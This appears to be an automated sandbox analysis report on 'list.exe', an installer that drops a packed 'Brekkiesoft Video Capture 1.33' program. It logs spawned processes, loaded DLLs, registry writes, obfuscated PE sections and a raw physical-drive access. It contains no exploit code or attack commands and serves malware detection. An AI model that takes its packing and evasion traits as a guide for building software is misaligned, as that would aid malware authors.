Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: bsoftvideocapture33.exe, bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: list.exe | ReversingLabs: Detection: 47%
                    Source: list.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: list.exe | String found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\list.exe | File read: C:\Users\user\Desktop\list.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\list.exe "C:\Users\user\Desktop\list.exe"
                    Source: C:\Users\user\Desktop\list.exe | Process created: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe"
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Process created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\list.exe | Process created: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Process created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Users\user\Desktop\list.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\list.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Section loaded: sfc_os.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: w32time.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: logoncli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: vmictimeprovider.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: mpclient.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: secur32.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: version.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: gpapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wscapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: urlmon.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: iertutil.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: srvcli.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: netutils.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: slc.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Window found: window name: TMainForm
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Brekkiesoft Video Capture_is1
                    Source: list.exe | Static file information: File size 3575195 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-0G4JQ.tmp.2.dr
                    Source: Binary string: msvcr71.pdb< source: is-5FBME.tmp.2.dr
                    Source: Binary string: msvcp71.pdb source: is-0G4JQ.tmp.2.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-B9LPS.tmp.2.dr
                    Source: Binary string: msvcr71.pdb source: is-5FBME.tmp.2.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Unpacked PE file: 6.2.bsoftvideocapture33.exe.400000.0.unpack _aett_1:ER;_aftt_1:R;_agtt_1:W;.rsrc:R;_ahtt_1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Unpacked PE file: 6.2.bsoftvideocapture33.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004502C0
                    Source: initial sample | Static PE information: section where entry point is pointing to: _aett_1
                    Source: bsoftvideocapture33.exe.2.dr | Static PE information: section name: _aett_1
                    Source: bsoftvideocapture33.exe.2.dr | Static PE information: section name: _aftt_1
                    Source: bsoftvideocapture33.exe.2.dr | Static PE information: section name: _agtt_1
                    Source: bsoftvideocapture33.exe.2.dr | Static PE information: section name: _ahtt_1
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /4
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /19
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /35
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /51
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /63
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /77
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /89
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /102
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /113
                    Source: is-1B315.tmp.2.dr | Static PE information: section name: /124
                    Source: is-B9LPS.tmp.2.dr | Static PE information: section name: Shared
                    Source: BrekkiesoftVideoCapture.exe.6.dr | Static PE information: section name: _aett_1
                    Source: BrekkiesoftVideoCapture.exe.6.dr | Static PE information: section name: _aftt_1
                    Source: BrekkiesoftVideoCapture.exe.6.dr | Static PE information: section name: _agtt_1
                    Source: BrekkiesoftVideoCapture.exe.6.dr | Static PE information: section name: _ahtt_1
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /4
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /19
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /35
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /51
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /63
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /77
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /89
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /102
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /113
                    Source: sqlite3.dll.6.dr | Static PE information: section name: /124
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0040994C push 00409989h; ret 2_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00483F88 push 00484096h; ret 2_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004062B4 push ecx; mov dword ptr [esp], eax 2_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004104E0 push ecx; mov dword ptr [esp], edx 2_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00412928 push 0041298Bh; ret 2_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00494CAC push ecx; mov dword ptr [esp], ecx 2_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0040CE38 push ecx; mov dword ptr [esp], edx 2_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004592D0 push 00459314h; ret 2_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0040F398 push ecx; mov dword ptr [esp], edx 2_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00443440 push ecx; mov dword ptr [esp], ecx 2_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0040546D push eax; ret 2_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0040553D push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004055BE push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00485678 push ecx; mov dword ptr [esp], ecx 2_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0040563B push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004517F8 push 0045182Bh; ret 2_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004519BC push ecx; mov dword ptr [esp], eax 2_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00477B08 push ecx; mov dword ptr [esp], edx 2_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00419C28 push ecx; mov dword ptr [esp], ecx 2_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045FD1C push ecx; mov dword ptr [esp], ecx 2_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00499D30 pushad ; retf 2_2_00499D3F
                    Source: bsoftvideocapture33.exe.2.dr | Static PE information: section name: _aett_1 entropy: 7.752870714749948
                    Source: BrekkiesoftVideoCapture.exe.6.dr | Static PE information: section name: _aett_1 entropy: 7.752870714749948

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 | 6_2_02C0E8A8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-0G4JQ.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-1B315.tmp
